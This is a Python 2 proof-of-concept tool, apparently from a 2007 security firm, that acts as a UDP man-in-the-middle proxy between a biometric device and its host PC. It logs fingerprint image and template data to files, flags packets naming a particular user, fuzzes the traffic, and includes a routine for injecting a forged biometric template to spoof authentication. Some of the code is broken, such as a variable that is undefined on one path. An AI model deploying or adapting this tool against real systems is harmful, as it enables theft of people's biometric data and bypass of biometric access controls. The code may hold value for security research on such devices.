# Biologger: UDP man-in-the-middle biometric data logger
#
# M. Lewis, IRM Plc 2007
#
# Modified proxyfuzzer of Rodrigo Marcos, IRM Plc 2007
#
# Specific control messages/bytes are omitted here as they are device specific.
# Further subroutines can be constructed for specific tasks as and when required.
# These are called within the datagramReceived functions
#

from twisted.protocols import portforward
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor
import getopt, sys
from random import randint

# UDP Proxy-related code:

class Client(DatagramProtocol):
	
	def __init__(self, server, host, port):
		self.server = server
		self.host = host
		self.port = port
    
	def startProtocol(self):
		self.transport.connect(desthost, destport)
    
	def datagramReceived(self, data, (host, port)):
		global verbose
		
		if verbose:
			print "Device ------> PC"
			print "%r" % data
			checkforimagedata(data)
			moddata = checkfortemplate(data,"templates.dat");
	        self.server.transport.write(moddata, (self.host, self.port))
 
class Server(DatagramProtocol):
	client = None
    
	def datagramReceived(self, data, (host, port)):
		if not self.client or self.client.host != host or self.client.port != port:
			self.client = Client(self, host, port)
			reactor.listenUDP(0, self.client)

		global verbose

		if verbose:
			print "PC ------> Device"
			print "%r" % data
			moddata = checkfortemplate(data,"TemplatesfromServer.dat")
		self.client.transport.write(moddata, (desthost, destport))
		
#
# code to explore fuzzing of device/server
#
def fuzz(data):
	l = len(data)
	temp = ""
	if l > 300:
		for i in range(10000):
			r = randint(0,255)
			temp = temp + chr(r)
		data = data + temp
	return data

#
# check for potential image data passing through the biologger
# run captured traffic through recreate_image.py
#
def checkforimagedata(data):
	l = len(data)
	# if more than 500 bytes, we may have image data
	if l > 500:
                # write the data to a file for offline analysis
		print "IMAGE DATA\n"
		f = open("fpimages.dat",'a')
		f.write(data)
		f.close()

#
# check for template data
#
def checkfortemplate(data,filename):
	l = len(data)
	if l > 300 and l < 500:
                # likely template data, so log to a file for offline analysis
		f=open(filename, 'a')
		f.write(data)
		f.close()
        # we can pick of specific bytes of the transfer and test for
        # specific conditions
        # E.g.
	header = data[0:2]
	# Or
	if data.find("Matt") != -1:
		print "Found User Matt!\n"
	return data
#
# used to inject own biometric data into a stream for example
#
def injectfingerdata(data):
	header = data[0:13]
	footer = data[305:]
	# mytemplate can contain a valid biometric template
	mytemplate = "\x90"
	# insert own template within the stream with valid header/footer
	data = header + mytemplate + footer
	return data
	
def startudpproxy():
	reactor.listenUDP(localport, Server())
	reactor.run()
	
def usage():
	print "Biologger, POC Biometric Data Logger, IRM Plc 2007"
	print "Modified from proxyfuzz by Rodrigo Marcos"
	print "usage():"
	print "python biologger.py -l <localport> -r <remotehost> -p <remoteport> [options]"
	print
	print " [options]"
	print "		-v: Verbose (outputs network traffic)"
	print "		-h: Help page"

verbose = False
localport = 0
desthost = ""
destport = 0

def main():
	global verbose
	global localport
	global desthost
	global destport
	
	try:
		opts, args = getopt.getopt(sys.argv[1:], "vhl:r:p:", ["help"])
	except getopt.GetoptError:
		usage()
		sys.exit(2)
	try:
		for o, a in opts:
			if o in ("-h", "--help"):
				usage()
				sys.exit()
			if o == "-l":
				localport=int(a)
			if o == "-r":
				desthost=a
			if o == "-p":
				destport=int(a)
			if o == "-v":
				verbose = True
					
				
	except:
		usage()
		sys.exit(2)
		
	if localport==0 or desthost=="" or destport==0:
            usage()
	    sys.exit(2)
	else:
	    startudpproxy()

if __name__ == "__main__":
    main()
    
    
